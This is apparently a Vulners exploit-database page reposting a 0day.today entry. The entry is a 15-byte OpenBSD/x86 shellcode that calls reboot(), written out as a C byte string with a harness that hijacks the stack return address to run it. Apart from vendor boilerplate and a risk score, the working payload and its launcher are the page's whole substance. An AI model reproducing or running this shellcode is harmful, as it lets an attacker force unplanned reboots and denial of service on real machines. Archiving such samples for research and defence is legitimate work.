Lucene search
K

OpenBSD/x86 - reboot() Shellcode (15 bytes)

🗓️ 15 Jan 2018 00:00:00Reported by beosrootType 
zdt
 zdt
🔗 0day.today👁 23 Views

OpenBSD/x86 reboot() Shellcode (15 bytes) - Author: beosroot, INFO: OpenBSD x86 reboot() shellcod

Code
//   ----------bsd/x86 reboot() shellcode-----------------
 
//  AUTHOR : beosroot
//  INFO   : OpenBSD x86 reboot() shellcode
//  EMAIL :  [email protected]
//           [email protected]
 
 
char shellcode[] = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80";
 
int main() {
 
  int *ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}
 
 
// the end o.O

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jan 2018 00:00Current
0.3Low risk
Vulners AI Score0.3
23